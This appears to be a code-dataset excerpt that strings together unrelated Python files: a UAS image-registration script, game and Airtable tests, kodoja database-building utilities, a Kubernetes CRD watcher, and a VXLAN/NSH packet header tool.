if img['default']:
print("The default image is currently: '%s'" % img['imagename'])
return img
return None
def find_image_by_name(images, img_name):
"""Search the list of registered images for one whose image name is
'img_name'. Return the image if found, otherwise None.
"""
for img in images:
if img['imagename'] == img_name:
return img
return None
def register_image(name, default=False):
"""Register an image by name with UAS
"""
okay_codes = [requests.codes['created'], requests.codes['ok']]
params = {
'default': default,
'imagename': name,
}
response = requests.post(IMAGES_URI, params=params, headers=HEADERS,
verify=True, timeout=120.0)
if response.status_code not in okay_codes:
raise UASError(
"failed to register image '%s' default: %s with UAS - %s[%d]" %
(name, str(default), response.text, response.status_code)
)
return 0
def check_default(img, default_img, images):
"""The current image ('img') should be set as default if it is the
proposed default image ('default_img'), and there is no current
default image or the current default image has the same image name
base (ignoring the tag) as the proposed default image.
"""
if default_img is None:
return False
if img != default_img:
return False
cur_default = find_default_image(images)
cur_default_name = cur_default['imagename'] if cur_default else None
cur_default_base = cur_default_name.split(':')[0] if cur_default else None
default_base = default_img.split(':')[0]
return cur_default is None or default_base == cur_default_base
def configure_internal_class(namespace, image_id, volumes, comment):
"""Configure a UAI class that is only internally reachable and HPE
supplied.
"""
okay_codes = [requests.codes['created'], requests.codes['ok']]
params = {
'comment': comment,
'image_id': image_id,
'public_ip': False,
'volume_list': volumes,
'uai_compute_network': True,
'namespace': namespace,
'default': False,
'resource_id': None,
'uai_creation_class': None,
'opt_ports': None,
'priority_class_name': None,
}
response = requests.post(CLASSES_URI, params=params, headers=HEADERS,
verify=True, timeout=120.0)
if response.status_code not in okay_codes:
raise UASError(
"failed to configure class '%s' with UAS - %s[%d]" %
(comment, response.text, response.status_code)
)
return 0
def update_classes(image_name, images, classes):
"""Look for UAI classes that create UAIs with images having the
same base-name as the specified image and update them to use the
specified image.
"""
okay_codes = [requests.codes['created'], requests.codes['ok']]
image = find_image_by_name(images, image_name)
if image is None:
print(
"WARNING: updating classes: image '%s' not found in %s -- "
"should only happen during unit testing, never in production" %
(image_name, str(images))
)
return 0
image_id = image['image_id']
basename = image_name.split(':')[0]
id_list = [image['image_id'] for image in images
if basename == image['imagename'].split(':')[0]]
matching_class_ids = [uai_class['class_id'] for uai_class in classes
if uai_class['uai_image']['image_id'] in id_list]
for class_id in matching_class_ids:
params = {'image_id': image_id}
uri = "%s/%s" % (CLASSES_URI, class_id)
response = requests.patch(uri, params=params, headers=HEADERS,
verify=True, timeout=120.0)
if response.status_code not in okay_codes:
raise UASError(
"failed to update image id in class '%s' to '%s' - %s[%d]" %
(class_id, image_id, response.text, response.status_code)
)
return 0
def usage(err=None):
""" Report correct command usage.
"""
usage_msg = """
update_uas [-d image-name] [-s image-name] -v [volume-list] [image-name [...]]
Where:
-s image-name
Specifies the name of the image to be registered for use in a
simple UAI for sanity testing UAS. The image-name must be in
the list of image-names specified in the arguments.
-d image-name
Specifies a candidate default image name from the list of
supplied image names that will be set if no default is already
designated in UAS when the command is run. The image-name must
be in the list of image-names specified in the arguments.
-v volume-list
Specifies a comma separated list of volume names to be
configured into a simple UAI class provided for sanity testing
UAS. These will be used only if they are configured, no
volumes will be added, and it is not an error to request a
volume name that is unknown to UAS.
"""[1:]
if err:
sys.stderr.write("%s\n" % err)
sys.stderr.write(usage_msg)
return 1
def cmdline(argv):
"""Parse arguments and return settings. Raise a usage error if there is
a problem.
"""
default_img_nm = None
simple_img_nm = None
simple_volnames = ["timezone", "lustre"]
try:
opts, args = getopt(argv, "s:d:v:")
except GetoptError as err:
raise UsageError from err
for opt in opts:
if opt[0] == "-d":
default_img_nm = opt[1]
if opt[0] == "-v":
simple_volnames = opt[1].split(',')
if opt[0] == "-s":
simple_img_nm = opt[1]
if default_img_nm and default_img_nm not in args:
raise UsageError(
"the proposed default image '%s' is not one of the images to "
"be registered" % default_img_nm
)
if simple_img_nm and simple_img_nm not in args:
raise UsageError(
"the proposed simple UAI image '%s' is not one of the images to "
"be registered" % simple_img_nm
)
return (default_img_nm, simple_img_nm, simple_volnames, args)
def main(argv):
""" main entrypoint
"""
retval = 0
default_img_nm, simple_img_nm, simple_volnames, args = cmdline(argv)
try:
images = get_registered_images()
except (RequestException, UASError) as err:
raise ContextualError from err
try:
simple_volumes = get_volume_ids(simple_volnames)
except (RequestException, UASError) as err:
raise ContextualError from err
try:
uai_classes = get_uai_classes()
except (RequestException, UASError) as err:
raise ContextualError from err
for img in args:
if find_image_by_name(images, img):
print("Image named '%s' is already registered, nothing done" % img)
continue
default = check_default(img, default_img_nm, images)
try:
register_image(img, default)
except (RequestException, UASError) as err:
print("Registering UAS image '%s' failed - %s" % (img, str(err)))
retval = 1
continue
print("Registered UAI image '%s', default=%s" % (img, str(default)))
# We (may) have registered new images, so get the up-to-date list
# from the UAS to use from here on in.
images = get_registered_images()
# If an image name was given for a simple UAI class, make the
# simple UAI class.
if simple_img_nm:
simple_image = find_image_by_name(images, simple_img_nm)
if not simple_image:
raise ContextualError(
"Cannot find simple image '%s' in UAS config"
)
try:
configure_internal_class(
namespace="user",
image_id=simple_image['image_id'],
volumes=simple_volumes,
comment=SIMPLE_UAI_CLASS_COMMENT
)
except (RequestException, UASError) as err:
raise ContextualError from err
# Go through the newly registered images and update any classes
# that are using images with the same base name as the new ones to
# use the new ones.
for img in args:
try:
update_classes(img, images, uai_classes)
except (RequestException, UASError) as err:
print(
"Failed to update classes using images similar to '%s' - %s" %
(img, str(err))
)
retval = 1
if retval != 0:
raise ContextualError(
"Errors detected during update see details above"
)
return 0
def entrypoint(argv):
""" Entrypoint function to handle exceptions from main and turn them into
return codes and error reports that will, eventually, become exit status.
"""
try:
return main(argv)
except UsageError as err:
usage(str(err))
return 1
except ContextualError as err:
print(str(err))
return 1
# start here
if __name__ == "__main__": # pragma no unit test
sys.exit(entrypoint(sys.argv[1:])) # pragma no unit test
``` |
{
"source": "johri002/Race-the-car",
"score": 3
} |
#### File: johri002/Race-the-car/test_Race_the_car.py
```python
import pytest
import Race_the_car
BOARDWIDTH = Race_the_car.BOARDWIDTH
BOARDHEIGHT = Race_the_car.BOARDHEIGHT
OPEN_SPACE = Race_the_car.OPEN_SPACE
PLAYER_ONE = Race_the_car.PLAYER_ONE
PLAYER_TWO = Race_the_car.PLAYER_TWO
BOARDWIDTH_CENTER = Race_the_car.BOARDWIDTH_CENTER
ONE_STARTING_ROW = Race_the_car.ONE_STARTING_ROW
TWO_STARTING_ROW = Race_the_car.TWO_STARTING_ROW
def test_getStartingBoard():
board = Race_the_car.getStartingBoard(OPEN_SPACE)
# player 1 position correct
assert board[BOARDWIDTH_CENTER][ONE_STARTING_ROW] == PLAYER_ONE
board[BOARDWIDTH_CENTER][ONE_STARTING_ROW] = OPEN_SPACE
# player 2 position correct
assert board[BOARDWIDTH_CENTER][TWO_STARTING_ROW] == PLAYER_TWO
board[BOARDWIDTH_CENTER][TWO_STARTING_ROW] = OPEN_SPACE
# Everything else empty spaces
for x in range(BOARDWIDTH):
for y in range(BOARDHEIGHT):
assert board[x][y] == OPEN_SPACE
# proper behavior if input is changed
board = Race_the_car.getStartingBoard(0)
assert board[BOARDWIDTH_CENTER][ONE_STARTING_ROW] == PLAYER_ONE
board[BOARDWIDTH_CENTER][ONE_STARTING_ROW] = 0
assert board[BOARDWIDTH_CENTER][TWO_STARTING_ROW] == PLAYER_TWO
board[BOARDWIDTH_CENTER][TWO_STARTING_ROW] = 0
for x in range(BOARDWIDTH):
for y in range(BOARDHEIGHT):
assert board[x][y] == 0
return
``` |
{
"source": "johrollin/kodoja",
"score": 3
} |
#### File: kodoja/diagnosticTool_scripts/database_modules.py
```python
import subprocess
import pandas as pd
import os
import re
import sys
import time
try:
# Python 3
from urllib.request import urlretrieve, urlcleanup
from urllib.error import URLError
except ImportError:
# Python 2
from urllib import urlretrieve, urlcleanup
URLError = IOError
def download_with_retries(url, destination, retries=5):
"""Download file using urlretrieve, with automatic retries.
If the n-th attempt fails, will wait for n-seconds before
trying again.
If the final retry fails, will abort the script with message
to stderr.
"""
for attempt in range(1, retries + 1):
urlcleanup() # Seems important with FTP on Python 2.7
try:
return urlretrieve(url, destination)
except URLError as err:
if attempt < retries:
time.sleep(attempt)
sys.stderr.write("Will retry downloading %r attempt %i\n"
% (url, attempt + 1))
else:
sys.stderr.write("ERROR: Failed to download %r\n" % url)
raise err
# Download refseq files from ncbi ftp site - use ncbi-genome-download
def ncbi_download(tool, genome_download_dir, parallel, host_taxid):
"""Download genomic or protein data from NCBI ftp site using ncbi-genome-download."""
assert (tool == "kraken") | (tool == "kaiju"),\
"Argument 'tool' must be either 'kraken' or 'kaiju'."
if tool == "kraken":
file_format = "fasta"
else:
file_format = "protein-fasta"
# Check directory exists
if not os.path.exists(genome_download_dir):
os.makedirs(genome_download_dir)
ngd_command = "ncbi-genome-download -F " + file_format + " -o " + genome_download_dir
if host_taxid:
# Single host ID, so no need to set the parallel option
taxid_ngd_command = ngd_command + " --species-taxid " + str(host_taxid) + " plant"
subprocess.check_call(taxid_ngd_command, shell=True)
ngd_command += " --parallel " + str(parallel) + " viral"
subprocess.check_call(ngd_command, shell=True)
def ncbi_rename_customDB(tool, genome_download_dir, host_taxid, extra_files=False, extra_taxid=False):
"""Rename ncbi data files for custom databases.
To add NCBI files to database Kraken and Kaiju require the files to have formatted
identifiers. This script modifies identifiers of files ending in .fna to kraken
format, and files ending in .faa to kaiju format. Once renamed, original files are
deleted.
"""
assert (tool == "kraken") | (tool == "kaiju"), "Argument 'tool' must be either 'kraken' or 'kaiju'."
if tool == "kraken":
file_extension = ".fna.gz"
else:
file_extension = ".faa.gz"
path_assembly_summary = os.path.join(genome_download_dir, "viral_assembly_summary.txt")
assembly_summary = pd.read_table(path_assembly_summary, sep='\t',
skiprows=1, header=0)
assembly_summary.rename(columns={'# assembly_accession': 'assembly_accession'},
inplace=True) # rename column to exclude "#"
# If extra files, create dictionary containing file names and taxIDs
if extra_files:
new_extra = []
for extraFiles in extra_files:
new_extra.append(extraFiles.split('/')[-1])
extra_dict = dict(zip(new_extra, extra_taxid))
kaiju_count = 1 # Count for protein sequences
for root, subdirs, files in os.walk(genome_download_dir):
for filename in files:
if filename.endswith(file_extension) and not filename.endswith(tool + file_extension):
zip_filename = os.path.join(root, filename)
subprocess.check_call("gunzip " + zip_filename, shell=True) # Uncompress ".gz" file
unzip_filename = zip_filename[:-3]
if root.endswith("extra"):
taxid = extra_dict[filename]
assert 'taxid' in locals() or 'taxid' in globals(),\
"Error: no taxid assigned for extra files provided"
elif root.split('/')[-2] == 'plant':
taxid = host_taxid
else:
# Retrieve assembly accession number for file path
assembly_accession = re.findall(r'/viral/([^(]*)/', unzip_filename)
assert 'assembly_accession' in locals() or 'assembly_accession' in globals(),\
"Can't locate assemble accession"
# retrieve taxid for file
taxid_list = list(assembly_summary.loc[assembly_summary['assembly_accession'] == assembly_accession[0]]["taxid"])
assert (len(taxid_list) == 1),\
"Taxid has " + len(taxid) + "values. Should only have 1 value"
taxid = taxid_list[0]
# Create new genomic file with rename sequence identifier to comply with tool
# requirements for custom database
renamed_file = unzip_filename[:-4] + "." + tool + unzip_filename[-4:]
with open(renamed_file, 'w') as out_file, open(unzip_filename, 'r') as in_file:
for line in in_file:
if line[0] == ">":
if tool == "kraken":
if " " in line:
insert = line.index(" ")
else:
insert = len(line) - 1
out_file.write(line[:insert] + "|kraken:taxid|" + str(taxid) + line[insert:])
else:
out_file.write(">" + str(kaiju_count) + "_" + str(taxid) + "\n")
kaiju_count += 1
else:
out_file.write(line)
# Delete original file
os.remove(unzip_filename)
# Compress modified file
subprocess.check_call("gzip " + renamed_file, shell=True)
def krakenDB_build(genome_download_dir, kraken_db_dir, threads, kraken_kmer, kraken_minimizer,
subset_vir_assembly, taxonomy, jellyfish_hash_size=False, kraken_max_dbSize=False):
"""Build kraken database with the renamed .fna files from ncbi."""
# Make a kraken database directory
if not os.path.exists(kraken_db_dir):
os.makedirs(kraken_db_dir)
# Download or create symlink of taxonomy for Kraken database
if taxonomy:
os.symlink(taxonomy, os.path.join(kraken_db_dir, "taxonomy"))
else:
subprocess.check_call("kraken-build --download-taxonomy --threads " +
str(threads) + " --db " + kraken_db_dir, shell=True)
file_list = []
# Add files downloaded and ready for kraken ("<file>.kraken.fna") to kraken library
for root, subdirs, files in os.walk(genome_download_dir):
for filename in files:
if subset_vir_assembly:
if root.split('/')[-1] in subset_vir_assembly and filename.endswith("kraken.fna.gz"):
file_list.append(os.path.join(root, filename))
elif root.split('/')[-2] == 'plant' and filename.endswith("kraken.fna.gz"):
file_list.append(os.path.join(root, filename))
elif root.endswith('extra') and filename.endswith("kraken.fna.gz"):
file_list.append(os.path.join(root, filename))
else:
if filename.endswith("kraken.fna.gz"):
file_list.append(os.path.join(root, filename))
for genome_file in file_list:
zip_filename = genome_file
subprocess.check_call("gunzip " + zip_filename, shell=True)
unzip_filename = zip_filename[:-3]
subprocess.check_call("kraken-build --add-to-library " + unzip_filename +
" --db " + kraken_db_dir, shell=True)
subprocess.check_call("gzip " + unzip_filename, shell=True)
kraken_command = "kraken-build --build --threads " + str(threads) + " --db " + \
kraken_db_dir + " --kmer-len " + str(kraken_kmer) + \
" --minimizer-len " + str(kraken_minimizer)
if kraken_max_dbSize:
kraken_command += " --max-db-size " + str(kraken_max_dbSize)
if jellyfish_hash_size:
kraken_command += " --jellyfish-hash-size " + jellyfish_hash_size
subprocess.check_call(kraken_command, shell=True)
# Clear unnecessary files from kraken database directory
# subprocess.check_call("kraken-build --clean --db " + kraken_db_dir, shell=True)
def kaijuDB_build(genome_download_dir, kaiju_db_dir, subset_vir_assembly):
"""Build kraken database with the renamed .faa files from ncbi."""
# Make a kaiju database directory
if not os.path.exists(kaiju_db_dir):
os.makedirs(kaiju_db_dir)
# Add files downloaded and ready for kaiju ("<file>.kaiju.faa") to one fasta file
kaijuDB_fasta = os.path.join(kaiju_db_dir, "kaiju_library.faa")
count = 0
file_list = []
for root, subdirs, files in os.walk(genome_download_dir):
for filename in files:
if subset_vir_assembly:
if root.split('/')[-1] in subset_vir_assembly and filename.endswith("kaiju.faa.gz"):
file_list.append(os.path.join(root, filename))
elif root.split('/')[-2] == 'plant' and filename.endswith("kaiju.faa.gz"):
file_list.append(os.path.join(root, filename))
elif root.endswith('extra') and filename.endswith("kaiju.faa.gz"):
file_list.append(os.path.join(root, filename))
else:
if filename.endswith("kaiju.faa.gz"):
file_list.append(os.path.join(root, filename))
with open(kaijuDB_fasta, "w") as out_file:
for protein_file in file_list:
zip_filename = protein_file
subprocess.check_call("gunzip " + zip_filename, shell=True)
unzip_filename = zip_filename[:-3]
with open(unzip_filename, 'r') as in_file:
for line in in_file:
if line[0] == ">":
out_file.write(line[:1] + str(count) + "_" + line[1:])
count += 1
else:
out_file.write(line)
subprocess.check_call("gzip " + unzip_filename, shell=True)
try:
# Assume kaiju v1.7.0 onwards:
subprocess.check_output(["kaiju-mkbwt", "-help"])
prefix = "kaiju-"
except OSError: # Expect FileNotFoundError on Python 3.3+
# kaiju prior to v1.7.0
prefix = ""
# Build Kaiju database
subprocess.check_call(prefix + "mkbwt -n 5 -a ACDEFGHIKLMNPQRSTVWY -o " +
os.path.join(kaiju_db_dir, "kaiju_library") + " " +
os.path.join(kaiju_db_dir, "kaiju_library.faa"),
shell=True)
subprocess.check_call(prefix + "mkfmi " + os.path.join(kaiju_db_dir, "kaiju_library"),
shell=True)
os.remove(os.path.join(kaiju_db_dir, "kaiju_library.faa"))
os.remove(os.path.join(kaiju_db_dir, "kaiju_library.bwt"))
os.remove(os.path.join(kaiju_db_dir, "kaiju_library.sa"))
``` |
{
"source": "johruss/airtable-python-wrapper",
"score": 3
} |
#### File: airtable-python-wrapper/tests/test_request_errors.py
```python
import json
import pytest
from mock import Mock
from requests import HTTPError
def http_error_with_url():
raise HTTPError("unable to process page%20url")
def json_decoder_error():
raise ValueError()
def test_error_mesg_in_json(table, response):
response.status_code = 400
response.json = Mock(return_value={"error": "here's what went wrong"})
with pytest.raises(HTTPError):
table._process_response(response)
def test_error_without_mesg_in_json(table, response):
response.status_code = 404
response.json = Mock(return_value={})
with pytest.raises(HTTPError):
table._process_response(response)
def test_non_422_error_with_json_decode_error(table, response):
response.status_code = 400
response.json.side_effect = json.decoder.JSONDecodeError('', '', 0)
with pytest.raises(HTTPError):
table._process_response(response)
``` |
{
"source": "johscheuer/k8s-python-crd",
"score": 2
} |
#### File: johscheuer/k8s-python-crd/main.py
```python
from kubernetes import client, config, watch
GROUP = 'stable.example.com'
RESOURCE_NAME = 'crontabs'
# https://github.com/kubernetes-client/python/issues/415
def create_crd(api_instance, crd):
try:
result = api_instance.create_custom_resource_definition(body=crd)
print(result['code'])
if result['code'] != 200:
print(result['status'])
except ValueError:
pass
# Configs can be set in Configuration class directly or using helper utility
config.load_kube_config()
crd_metadata = client.V1ObjectMeta(name='%s.%s' % RESOURCE_NAME, GROUP)
crd_validation = client.V1beta1CustomResourceValidation(
open_apiv3_schema=client.V1beta1JSONSchemaProps(
properties={
'cronSpec': client.V1beta1JSONSchemaProps(
type='string',
pattern='^(\d+|\*)(/\d+)?(\s+(\d+|\*)(/\d+)?){4}$',
),
'replicas': client.V1beta1JSONSchemaProps(
type='integer',
minimum=1,
maximum=10,
)
}
)
)
crd_spec = client.V1beta1CustomResourceDefinitionSpec(
group=GROUP,
version='v1',
scope='Namespaced',
names=client.V1beta1CustomResourceDefinitionNames(
plural=RESOURCE_NAME,
singular='crontab',
kind='CronTab',
short_names=['ct']
),
validation=crd_validation,
)
crd = client.V1beta1CustomResourceDefinition(
api_version='apiextensions.k8s.io/v1beta1',
kind='CustomResourceDefinition',
metadata=crd_metadata,
spec=crd_spec,
status=None)
api_instance = client.ApiextensionsV1beta1Api()
result_list = api_instance.list_custom_resource_definition()
for item in result_list.items:
if item.metadata.name == crd.metadata.name:
print('CRD is already present')
print(item.metadata.name)
else:
create_crd(api_instance, crd)
if len(result_list.items) == 0:
create_crd(api_instance, crd)
# Watch all crds
crds = client.CustomObjectsApi()
resource_version = ''
for event in watch.Watch().stream(
crds.list_cluster_custom_object,
GROUP,
'v1',
RESOURCE_NAME,
resource_version=resource_version):
obj = event["object"]
operation = event['type']
spec = obj.get("spec")
if not spec:
continue
metadata = obj.get("metadata")
resource_version = metadata['resourceVersion']
name = metadata['name']
print("Handling %s on %s" % (operation, name))
``` |
{
"source": "johscheuer/OPNFV-Lab",
"score": 2
} |
#### File: OPNFV-Lab/service-function/vxlan_tool.py
```python
import socket
import sys
import argparse
import struct
from ctypes import Structure, c_ubyte, c_ushort, c_uint
__author__ = "<NAME>, <NAME>"
__copyright__ = "Copyright(c) 2015, Intel, Inc. and Cisco Systems, Inc."
__version__ = "0.2"
__email__ = "<EMAIL>, <EMAIL>"
__status__ = "beta"
NSH_TYPE1_LEN = 0x6
NSH_MD_TYPE1 = 0x1
NSH_VERSION1 = int('00', 2)
NSH_NEXT_PROTO_IPV4 = int('00000001', 2)
NSH_NEXT_PROTO_OAM = int('00000100', 2)
NSH_NEXT_PROTO_ETH = int('00000011', 2)
NSH_FLAG_ZERO = int('00000000', 2)
IP_HEADER_LEN = 5
IPV4_HEADER_LEN_BYTES = 20
IPV4_VERSION = 4
IPV4_PACKET_ID = 54321
IPV4_TTL = 255
IPV4_TOS = 0
IPV4_IHL_VER = (IPV4_VERSION << 4) + IP_HEADER_LEN
UDP_HEADER_LEN_BYTES = 8
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
class VXLAN(Structure):
_fields_ = [('flags', c_ubyte),
('reserved', c_uint, 16),
('next_protocol', c_uint, 8),
('vni', c_uint, 24),
('reserved2', c_uint, 8)]
def __init__(self, flags=int('00001000', 2), reserved=0, next_protocol=0,
vni=int('111111111111111111111111', 2),
reserved2=0, *args, **kwargs):
super(self.__class__, self).__init__(*args, **kwargs)
self.flags = flags
self.reserved = reserved
self.next_protocol = next_protocol
self.vni = vni
self.reserved2 = reserved2
header_size = 8
def build(self):
return struct.pack('!B H B I',
self.flags,
self.reserved,
self.next_protocol,
(self.vni << 8) + self.reserved2)
class ETHHEADER(Structure):
_fields_ = [('dmac0', c_ubyte),
('dmac1', c_ubyte),
('dmac2', c_ubyte),
('dmac3', c_ubyte),
('dmac4', c_ubyte),
('dmac5', c_ubyte),
('smac0', c_ubyte),
('smac1', c_ubyte),
('smac2', c_ubyte),
('smac3', c_ubyte),
('smac4', c_ubyte),
('smac5', c_ubyte),
('ethertype0', c_ubyte),
('ethertype1', c_ubyte)]
header_size = 14
def build(self):
return struct.pack('!B B B B B B B B B B B B B B',
self.dmac0,
self.dmac1,
self.dmac2,
self.dmac3,
self.dmac4,
self.dmac5,
self.smac0,
self.smac1,
self.smac2,
self.smac3,
self.smac4,
self.smac5,
self.ethertype0,
self.ethertype1)
class BASEHEADER(Structure):
"""
Represent a NSH base header
"""
_fields_ = [('version', c_ushort, 2),
('flags', c_ushort, 8),
('length', c_ushort, 6),
('md_type', c_ubyte),
('next_protocol', c_ubyte),
('service_path', c_uint, 24),
('service_index', c_uint, 8)]
def __init__(self, service_path=1, service_index=255,
version=NSH_VERSION1, flags=NSH_FLAG_ZERO,
length=NSH_TYPE1_LEN, md_type=NSH_MD_TYPE1,
proto=NSH_NEXT_PROTO_ETH, *args, **kwargs):
super(self.__class__, self).__init__(*args, **kwargs)
self.version = version
self.flags = flags
self.length = length
self.md_type = md_type
self.next_protocol = proto
self.service_path = service_path
self.service_index = service_index
header_size = 8
def build(self):
return struct.pack(
'!H B B I',
(self.version << 14) + (self.flags << 6) + self.length,
self.md_type,
self.next_protocol,
(self.service_path << 8) + self.service_index)
class CONTEXTHEADER(Structure):
_fields_ = [('network_platform', c_uint),
('network_shared', c_uint),
('service_platform', c_uint),
('service_shared', c_uint)]
header_size = 16
def __init__(self, network_platform=0x00, network_shared=0x00,
service_platform=0x00, service_shared=0x00, *args, **kwargs):
super(self.__class__, self).__init__(*args, **kwargs)
self.network_platform = network_platform
self.network_shared = network_shared
self.service_platform = service_platform
self.service_shared = service_shared
def build(self):
return struct.pack('!I I I I',
self.network_platform,
self.network_shared,
self.service_platform,
self.service_shared)
class IP4HEADER(Structure):
_fields_ = [
('ip_ihl', c_ubyte),
('ip_ver', c_ubyte),
('ip_tos', c_ubyte),
('ip_tot_len', c_ushort),
('ip_id', c_ushort),
('ip_frag_offset', c_ushort),
('ip_ttl', c_ubyte),
('ip_proto', c_ubyte),
('ip_chksum', c_ushort),
('ip_saddr', c_uint),
('ip_daddr', c_uint)]
header_size = 20
def build(self):
ip_header_pack = struct.pack('!B B H H H B B H I I',
IPV4_IHL_VER,
self.ip_tos,
self.ip_tot_len,
self.ip_id,
self.ip_frag_offset,
self.ip_ttl,
self.ip_proto,
self.ip_chksum,
self.ip_saddr,
self.ip_daddr)
return ip_header_pack
def set_ip_checksum(self, checksum):
self.ip_chksum = checksum
class UDPHEADER(Structure):
"""
Represents a UDP header
"""
_fields_ = [
('udp_sport', c_ushort),
('udp_dport', c_ushort),
('udp_len', c_ushort),
('udp_sum', c_ushort)]
header_size = 8
def build(self):
udp_header_pack = struct.pack('!H H H H',
self.udp_sport,
self.udp_dport,
self.udp_len,
self.udp_sum)
return udp_header_pack
class PSEUDO_UDPHEADER(Structure):
""" Pseudoheader used in the UDP checksum."""
def __init__(self):
self.src_ip = 0
self.dest_ip = 0
self.zeroes = 0
self.protocol = 17
self.length = 0
def build(self):
""" Create a string from a pseudoheader """
p_udp_header_pack = struct.pack('!I I B B H',
self.src_ip,
self.dest_ip,
self.zeroes,
self.protocol,
self.length)
return p_udp_header_pack
class TCPHEADER(Structure):
"""
Represents a TCP header
"""
_fields_ = [
('tcp_sport', c_ushort),
('tcp_dport', c_ushort),
('tcp_len', c_ushort),
('tcp_sum', c_ushort)]
header_size = 8
def decode_eth(payload, offset, eth_header_values):
eth_header = payload[offset:(offset+14)]
_header_values = struct.unpack('!B B B B B B B B B B B B B B', eth_header)
eth_header_values.dmac0 = _header_values[0]
eth_header_values.dmac1 = _header_values[1]
eth_header_values.dmac2 = _header_values[2]
eth_header_values.dmac3 = _header_values[3]
eth_header_values.dmac4 = _header_values[4]
eth_header_values.dmac5 = _header_values[5]
eth_header_values.smac0 = _header_values[6]
eth_header_values.smac1 = _header_values[7]
eth_header_values.smac2 = _header_values[8]
eth_header_values.smac3 = _header_values[9]
eth_header_values.smac4 = _header_values[10]
eth_header_values.smac5 = _header_values[11]
eth_header_values.ethertype0 = _header_values[12]
eth_header_values.ethertype1 = _header_values[13]
def decode_ip(payload, ip_header_values):
ip_header = payload[14:34]
_header_values = struct.unpack('!B B H H H B B H I I', ip_header)
ip_header_values.ip_ihl = _header_values[0] & 0x0F
ip_header_values.ip_ver = _header_values[0] >> 4
ip_header_values.ip_tos = _header_values[1]
ip_header_values.ip_tot_len = _header_values[2]
ip_header_values.ip_id = _header_values[3]
ip_header_values.ip_frag_offset = _header_values[4]
ip_header_values.ip_ttl = _header_values[5]
ip_header_values.ip_proto = _header_values[6]
ip_header_values.ip_chksum = _header_values[7]
ip_header_values.ip_saddr = _header_values[8]
ip_header_values.ip_daddr = _header_values[9]
def decode_udp(payload, udp_header_values):
udp_header = payload[34:42]
_header_values = struct.unpack('!H H H H', udp_header)
udp_header_values.udp_sport = _header_values[0]
udp_header_values.udp_dport = _header_values[1]
udp_header_values.udp_len = _header_values[2]
udp_header_values.udp_sum = _header_values[3]
def decode_tcp(payload, offset, tcp_header_values):
tcp_header = payload[(108+offset):(116+offset)]
_header_values = struct.unpack('!H H H H', tcp_header)
tcp_header_values.tcp_sport = _header_values[0]
tcp_header_values.tcp_dport = _header_values[1]
tcp_header_values.tcp_len = _header_values[2]
tcp_header_values.tcp_sum = _header_values[3]
def decode_vxlan(payload, vxlan_header_values):
"""Decode the VXLAN header for a received packets"""
vxlan_header = payload[42:50]
_header_values = struct.unpack('!B H B I', vxlan_header)
vxlan_header_values.flags = _header_values[0]
vxlan_header_values.reserved = _header_values[1]
vxlan_header_values.next_protocol = _header_values[2]
vni_rsvd2 = _header_values[3]
vxlan_header_values.vni = vni_rsvd2 >> 8
vxlan_header_values.reserved2 = vni_rsvd2 & 0x000000FF
def decode_nsh_baseheader(payload, offset, nsh_base_header_values):
"""Decode the NSH base headers for a received packets"""
base_header = payload[offset:(offset+8)]
_header_values = struct.unpack('!H B B I', base_header)
start_idx = _header_values[0]
nsh_base_header_values.md_type = _header_values[1]
nsh_base_header_values.next_protocol = _header_values[2]
path_idx = _header_values[3]
nsh_base_header_values.version = start_idx >> 14
nsh_base_header_values.flags = start_idx >> 6
nsh_base_header_values.length = start_idx >> 0
nsh_base_header_values.service_path = path_idx >> 8
nsh_base_header_values.service_index = path_idx & 0x000000FF
def decode_nsh_contextheader(payload, offset, nsh_context_header_values):
"""Decode the NSH context headers for a received packet"""
context_header = payload[offset:(offset+16)]
_header_values = struct.unpack('!I I I I', context_header)
nsh_context_header_values.network_platform = _header_values[0]
nsh_context_header_values.network_shared = _header_values[1]
nsh_context_header_values.service_platform = _header_values[2]
nsh_context_header_values.service_shared = _header_values[3]
def compute_internet_checksum(data):
"""
Function for Internet checksum calculation. Works
for both IP and UDP.
"""
checksum = 0
n = len(data) % 2
# data padding
pad = bytearray('', encoding='UTF-8')
if n == 1:
pad = bytearray(b'\x00')
# for i in range(0, len(data + pad) - n, 2):
for i in range(0, len(data)-1, 2):
checksum += (ord(data[i]) << 8) + (ord(data[i + 1]))
if n == 1:
checksum += (ord(data[len(data)-1]) << 8) + (pad[0])
while checksum >> 16:
checksum = (checksum & 0xFFFF) + (checksum >> 16)
checksum = ~checksum & 0xffff
return checksum
# Implements int.from_bytes(s, byteorder='big')
def int_from_bytes(s):
return sum(ord(c) << (i * 8) for i, c in enumerate(s[::-1]))
def build_ethernet_header_swap(myethheader):
""" Build Ethernet header """
newethheader = ETHHEADER()
newethheader.smac0 = myethheader.dmac0
newethheader.smac1 = myethheader.dmac1
newethheader.smac2 = myethheader.dmac2
newethheader.smac3 = myethheader.dmac3
newethheader.smac4 = myethheader.dmac4
newethheader.smac5 = myethheader.dmac5
newethheader.dmac0 = myethheader.smac0
newethheader.dmac1 = myethheader.smac1
newethheader.dmac2 = myethheader.smac2
newethheader.dmac3 = myethheader.smac3
newethheader.dmac4 = myethheader.smac4
newethheader.dmac5 = myethheader.smac5
newethheader.ethertype0 = myethheader.ethertype0
newethheader.ethertype1 = myethheader.ethertype1
return newethheader
def build_ipv4_header(ip_tot_len, proto, src_ip, dest_ip, swap_ip):
"""
Builds a complete IP header including checksum
"""
if src_ip:
ip_saddr = socket.inet_aton(src_ip)
else:
ip_saddr = socket.inet_aton(socket.gethostbyname(socket.gethostname()))
if (swap_ip):
new_ip_daddr = int_from_bytes(ip_saddr)
new_ip_saddr = socket.inet_aton(dest_ip)
new_ip_saddr = int_from_bytes(new_ip_saddr)
else:
new_ip_saddr = int_from_bytes(ip_saddr)
new_ip_daddr = int_from_bytes(socket.inet_aton(dest_ip))
ip_header = IP4HEADER(IP_HEADER_LEN, IPV4_VERSION,
IPV4_TOS, ip_tot_len,
IPV4_PACKET_ID, 0, IPV4_TTL,
proto, 0, new_ip_saddr, new_ip_daddr)
checksum = compute_internet_checksum(ip_header.build())
ip_header.set_ip_checksum(checksum)
ip_header_pack = ip_header.build()
return ip_header, ip_header_pack
def build_udp_header(src_port, dest_port, ip_header, data):
"""
Building an UDP header requires fields from
IP header in order to perform checksum calculation
"""
# build UDP header with sum = 0
udp_header = UDPHEADER(src_port,
dest_port,
UDP_HEADER_LEN_BYTES + len(data), 0)
udp_header_pack = udp_header.build()
# build Pseudo Header
